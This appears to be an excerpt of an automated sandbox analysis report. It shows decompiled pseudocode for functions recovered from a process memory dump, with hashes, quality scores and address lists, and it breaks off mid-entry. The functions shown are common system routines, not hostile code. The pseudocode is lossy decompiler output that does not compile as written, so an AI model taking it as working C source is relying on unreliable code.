0x036300d9
0x0367c03d
0x0367c046
0x0367c046
0x036300df
0x036300e2
0x036300ea
0x036300ef
0x036300f2
0x036300f6
0x03630111
0x03630117
0x03630117
0x00000000
0x036300f6
0x036300d0
0x036300d0
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cff476c82734d014fce86fecbeebbe13572037f4aee4d9aaad813c1e914bfaed
Instruction ID: 8ab2477dcd565cdca85aa6af30f021f10e299173e5c5e3888152efbac8169b30
Opcode Fuzzy Hash: cff476c82734d014fce86fecbeebbe13572037f4aee4d9aaad813c1e914bfaed
Instruction Fuzzy Hash: AA319E31601B04CFD725CF28C984B9AB3E5FF89714F1885ADE4978BB90EB75A805CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03696C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03696C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03637D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3707b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03634620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0365F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03637D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03659AE0();
						_t23 = L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x03696c0a
0x03696c0f
0x03696c10
0x03696c13
0x03696c15
0x03696c19
0x03696c1c
0x03696c21
0x03696c28
0x03696c3a
0x03696c2a
0x03696c33
0x03696c33
0x03696c3f
0x03696c48
0x03696c4d
0x03696c60
0x03696c65
0x03696c69
0x03696c73
0x03696c79
0x03696c7f
0x03696c86
0x03696c90
0x03696c94
0x03696ca6
0x03696cb2
0x03696cbd
0x03696cbd
0x03696cc3
0x03696cc7
0x03696ccb
0x03696cd0
0x03696cd1
0x03696ce2
0x03696ce2
0x03696c69
0x03696ced

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd22bc295204e5ae22300577f68a8a149815b6954d816946bf84ddc6768edcf2
Instruction ID: 15c57e308e7d9d5139f2cc5b5a3993e1749a80eda7c9174525ad474b559360c7
Opcode Fuzzy Hash: cd22bc295204e5ae22300577f68a8a149815b6954d816946bf84ddc6768edcf2
Instruction Fuzzy Hash: 8C219AB5A00644EBDB15DB68D980E2AB7B8FF49710F04006AF904CB790DB34ED10CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 036590AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E036590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0366D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0364E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03634620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0365F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0364A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x036590af
0x036590b8
0x036590bb
0x036590bf
0x036590c2
0x036590c2
0x036590c8
0x036590cb
0x036590cd
0x036914d7
0x036914eb
0x036914eb
0x00000000
0x036914eb
0x036914db
0x036914e6
0x00000000
0x036914f2
0x036914e8
0x00000000
0x036914e8
0x036590d8
0x036590da
0x036590dd
0x036590e5
0x00000000
0x03659139
0x036590fa
0x036590fe
0x03659142
0x00000000
0x03659142
0x03659104
0x03659107
0x0365910b
0x03659110
0x03659118
0x03659147
0x03659148
0x0365914f
0x03659150
0x03659151
0x03659152
0x03659156
0x0365915d
0x03659160
0x03659168
0x0365916c
0x036591bc
0x036591be
0x00000000
0x036591be
0x0365916e
0x03659173
0x03659176
0x00000000
0x00000000
0x0365917c
0x03659180
0x036591b5
0x00000000
0x036591b5
0x03659182
0x03659185
0x03659189
0x00000000
0x00000000
0x0365918e
0x03659190
0x03659198
0x00000000
0x00000000
0x036591a0
0x00000000
0x036591ad
0x036591ad
0x036591b0
0x036591b1
0x00000000
0x03659185
0x0365911a
0x0365911c
0x0365911f
0x03659125
0x03659127
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 212e5db5b7cddc782cb48710b2089a56a587be2a7b95a65d7e7a5ee512e10a73
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: BC214F75A00315EFDB21DF69C944A6AFBF8EB44750F14887AF949AB210D770AD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 03643B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E03643B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x37084c4; // 0x0
				_v12 = 1;
				_v8 =  *0x37084c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x37084c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0365AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0365FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x37084c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x37084c4; // 0x0
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x03643b89
0x03643b96
0x03643ba1
0x03643bab
0x03643bb5
0x03643bb9
0x03686298
0x03643bbf
0x03643bc2
0x03643bc3
0x03643bc9
0x03643bca
0x03643bcc
0x03643bcd
0x03643bd4
0x03643bd6
0x03643bdb
0x03643bea
0x03643bf7
0x03643bfb
0x03643bff
0x03643c09
0x03643c0a
0x03643c0b
0x03643c0f
0x03643c14
0x03643c18
0x03643c18
0x03643bfb
0x03643c1b
0x03643c30
0x03643c30
0x03643c3d

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25975dc9f5ae36b23a10ce7c02b8a0a7f2536dae7470de10370a943feb4b8e9f
Instruction ID: 88287b1a84ffcefe67be4155c5b4f5bdd812bbaee9e7b615a5d64accbbcb2a54
Opcode Fuzzy Hash: 25975dc9f5ae36b23a10ce7c02b8a0a7f2536dae7470de10370a943feb4b8e9f
Instruction Fuzzy Hash: 0D218E76A00608EFCB01DF98CD81B5ABBBDFB45608F2541A8F908AB251D775AD11CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03696CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03696CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03637D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03637D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x35f5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0364F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0364F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03697016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03632400( &_v52);
								}
								_t21 = L03632400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x03696cfb
0x03696d00
0x03696d02
0x03696d06
0x03696d0a
0x03696d0e
0x03696d19
0x03696d2b
0x03696d1b
0x03696d24
0x03696d24
0x03696d33
0x03696d39
0x03696d46
0x03696d4f
0x03696d61
0x03696d51
0x03696d5a
0x03696d5a
0x03696d69
0x03696d6b
0x03696d6d
0x03696d6f
0x03696d6f
0x03696d74
0x03696d79
0x03696d7a
0x03696d7f
0x03696d82
0x03696d88
0x03696d89
0x03696d90
0x03696d94
0x03696da7
0x03696db1
0x03696db1
0x03696dbb
0x03696dbb
0x03696d90
0x03696d69
0x03696d46
0x03696dc6

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0f1b27378fe965bfeabdfa9afedd3ec264f44cd0bf69b1d54b7f76d5509dbf
Instruction ID: 8cdef3f406d7116472eea96b8b1a6f28351b0523d037c720a06305c1ff933b0c
Opcode Fuzzy Hash: cf0f1b27378fe965bfeabdfa9afedd3ec264f44cd0bf69b1d54b7f76d5509dbf
Instruction Fuzzy Hash: 5521F2725003449BEB11DF28CA44B6BF7ECEF816A0F08085BF950DB261E734C90DC6A6

Uniqueness

Uniqueness Score: -1.00%

Function 036E070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E036E070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E036E07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E036DAFDE( &_v8,  &_v12);
					E036E1293(_t38, _v28, _t60);
					if(E03637D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E036D14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x036e071b
0x036e0724
0x036e0734
0x036e0738
0x036e074b
0x036e074b
0x036e0753
0x036e0753
0x036e0759
0x036e075d
0x036e0774
0x036e0779
0x036e077d
0x036e0789
0x036e0795
0x036e07a7
0x036e0797
0x036e07a0
0x036e07a0
0x036e07af
0x036e07c4
0x036e07cd
0x036e07cd
0x036e07af
0x036e07dc

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 3ed98d232bd013cb53fad43211e1f525936255261468662623a58d7ba876ffba
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: EE21263A2043049FDB05DF18C884B6ABBA5EFD5350F08856DF9959F381DB70D909CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03697794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E03697794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3707b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0365F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03637D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03659AE0();
					_t24 = L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x03697799
0x0369779a
0x0369779b
0x036977a3
0x036977ab
0x036977ae
0x036977b1
0x036977b1
0x036977bf
0x036977c4
0x036977c8
0x036977ce
0x036977d4
0x036977e0
0x036977e0
0x036977d6
0x036977d6
0x036977de
0x00000000
0x00000000
0x036977de
0x036977e5
0x036977f0
0x036977f3
0x036977f6
0x036977fd
0x03697800
0x0369780c
0x03697818
0x0369782b
0x0369781a
0x03697823
0x03697823
0x03697830
0x03697831
0x03697838
0x0369783d
0x0369783e
0x0369784f
0x0369784f
0x0369785a

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee1f9b89be9305a6a71b6686f2db07255e9d0d459b2f0ad2d27184cfb6c30fe
Instruction ID: 8ee5e6ca49d36b59cf588abab43d95ea63004e447f8f04a3269950d44a338aa5
Opcode Fuzzy Hash: aee1f9b89be9305a6a71b6686f2db07255e9d0d459b2f0ad2d27184cfb6c30fe
Instruction Fuzzy Hash: D3219F76510604ABCB25DF69DD84EABB7ACEF48340F14456EF90ACB750D634E900CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0363AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0363AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03637D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03637D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03637D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03637D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03697794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0363ae78
0x0363ae7c
0x0363ae7e
0x0363ae81
0x0363ae86
0x0363ae8d
0x03682691
0x0363ae93
0x0363ae93
0x0363ae93
0x0363ae98
0x0363ae9d
0x036826a2
0x036826b4
0x036826a4
0x036826ad
0x036826ad
0x036826b9
0x00000000
0x036826bb
0x00000000
0x036826bb
0x0363aea3
0x0363aea3
0x0363aea3
0x0363aeaa
0x036826c0
0x036826c9
0x036826c9
0x0363aeb3
0x036826d4
0x036826e1
0x00000000
0x00000000
0x036826e7
0x036826ee
0x036826f0
0x036826f9
0x036826f9
0x03682702
0x03682708
0x03682708
0x0368270b
0x0368270f
0x03682711
0x03682711
0x03682725
0x03682725
0x00000000
0x0363aeb9
0x0363aeb9
0x0363aebf
0x0363aebf
0x0363aeb3

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 3b5c81af41ac8a32876ab34b57ccb24a2ac9755699118aead192d76fc7fff5a1
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: AD210471A066848FDB11EF69DA54B2577E8EF09350F0D05E0EC048B392D734DC91D690

Uniqueness

Uniqueness Score: -1.00%

Function 0364FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0364FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E036276E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0364fd9b
0x0364fda0
0x0364fda1
0x0364fdab
0x0364fdad
0x0364fdb0
0x0364fdb8
0x0364fe0f
0x0364fde6
0x0364fde9
0x0364fdec
0x0368c0c0
0x0364fdfe
0x0364fe06
0x0364fe06
0x0368c0c8
0x0364fe2d
0x0364fe2d
0x00000000
0x0364fe2d
0x0368c0d1
0x0368c0e0
0x0368c0e5
0x0368c0e5
0x0368c0e8
0x00000000
0x0368c0e8
0x0364fdf4
0x00000000
0x00000000
0x0364fdf6
0x0364fdfa
0x0364fe1a
0x0364fe1f
0x0364fe1f
0x0364fdfc
0x00000000
0x0364fdfc
0x0364fdcc
0x0364fdd0
0x0364fe26
0x00000000
0x0364fe26
0x0364fdd8
0x0364fddb
0x0364fddd
0x0364fde0
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b12aa04e9adf08e87f484538d9fda02ab7d0c17adaf04bfd6d1486ec1cdef52a
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 13218B72A40A45EFC731CF0AC640E66F7E9EB94A11F29817EE9498BB11D731EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0364B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0364B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03632280(_t12, 0x3708608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E036500C2(0x3708608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0364b395
0x0364b3a2
0x0364b3a5
0x0364b3aa
0x0364b3b2
0x0364b3ba
0x0364b3bd
0x0364b3c0
0x0364b3c4
0x0364b3c9
0x0368a3e9
0x0368a3ed
0x0368a3f0
0x0368a3ff
0x0368a403
0x0368a409
0x00000000
0x00000000
0x0368a40b
0x0368a40b
0x0368a40f
0x0368a415
0x0368a423
0x0368a423
0x0368a415
0x0364b3d1
0x0364b3e8
0x0364b3e8
0x0364b3d9

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53959e406e092d9464edab800d51f5cccc984cf996a6ce4d0e090b2cf03a70cb
Instruction ID: f3d7d38101639b8b21676ffdb066af6cc272129e7594ba32867b7c90589c036e
Opcode Fuzzy Hash: 53959e406e092d9464edab800d51f5cccc984cf996a6ce4d0e090b2cf03a70cb
Instruction Fuzzy Hash: 63116B377052149BCB19DA55DE81A2F73AAEBC9730F29013DED16CB380D9719C02C695

Uniqueness

Uniqueness Score: -1.00%

Function 03619240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

